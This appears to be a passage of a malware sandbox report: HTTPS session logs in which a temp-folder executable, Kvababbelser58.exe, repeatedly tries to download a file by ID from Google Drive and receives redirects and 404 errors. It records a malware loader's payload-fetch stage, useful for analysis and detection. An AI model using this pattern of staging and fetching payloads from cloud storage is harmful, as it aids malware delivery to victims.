                                                                                                      Content-Security-Policy: script-src 'nonce-uv560dld1hIrqGfxxGnlFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      11 | 192.168.2.7 | 49980 | 142.250.181.225 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:12 UTC | 468 | OUT | GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:13 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgQpt0l3MUuSkNT7nfm_Au9Z6434htwNXXNx0ZvmGP3odNFiLqxaSK351AuuZliWXe7HOJYwCws
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:13 GMT
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-lJ5eyAKr-mNs6yS5YfMxvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:13 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="udZpN2OCC-YE6_3u1eb2HA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      12 | 192.168.2.7 | 49981 | 216.58.206.46 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:14 UTC | 426 | OUT | GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:14 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:14 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-fYr9K55YxkWABq6U3wA3uA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      13 | 192.168.2.7 | 49982 | 142.250.181.225 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:15 UTC | 468 | OUT | GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:15 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgT1_rzEGtGYuznX4Czuy4FnlE165dYWccqrkEdeE_csXjBkfkcmT8CD5_mJU_v6WiPeK73lFZU
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:15 GMT
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy: script-src 'nonce-u8Kbn0lewygagNt_uCbuBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
2025-01-10 23:50:15 UTC  1652               IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gY38W58fFYzjaon0FAoA1w">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
14          192.168.2.7  49983        216.58.206.46    443               5912  C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-10 23:50:16 UTC  426                OUT        GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
2025-01-10 23:50:17 UTC  1920               IN         HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:16 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-OSwiDDBTOgBPEN5eU1pgAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
15          192.168.2.7  49984        142.250.181.225  443               5912  C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-10 23:50:17 UTC  468                OUT        GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
2025-01-10 23:50:18 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgTPYGoK4rA3dvtot4T3Vu7NoRa4gPmnXIT49bifI0XhqnxjQteiAURvqRKidXGRyTvV
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:17 GMT
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy: script-src 'nonce-R9nLg3XsM-V8l1kl1d6MwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
2025-01-10 23:50:18 UTC  1652               IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UN36pwoTHb1QBA8uglj_7Q">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
16          192.168.2.7  49985        216.58.206.46    443               5912  C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-10 23:50:18 UTC  426                OUT        GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
2025-01-10 23:50:19 UTC  1920               IN         HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:19 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-Wv2czfAXnq_hGGIGBLt6mA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
17          192.168.2.7  49986        142.250.181.225  443               5912  C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-10 23:50:19 UTC  468                OUT        GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
2025-01-10 23:50:20 UTC  1851               IN         HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFiumC4W-PVQDL-jgQUUylJOI_Tj1OUiaClqmguwEUy5V4hShk0PUOZMYIPL5Pe8wsSPhR4W_55R1ao
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:20 GMT
                                                                                                      Content-Security-Policy: script-src 'nonce-ncOZ6G1kr-wOiby_Juahrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
2025-01-10 23:50:20 UTC  1652               IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_AeVdWqOE5kn0My2iT7g5A">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
18          192.168.2.7  49987        216.58.206.46    443               5912  C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-10 23:50:21 UTC  426                OUT        GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
2025-01-10 23:50:21 UTC  1920               IN         HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:21 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy: script-src 'nonce-PnIElex_1Th8qVJ1whOcYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      19 | 192.168.2.7 | 49988 | 142.250.181.225 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:22 UTC | 468 | OUT | GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
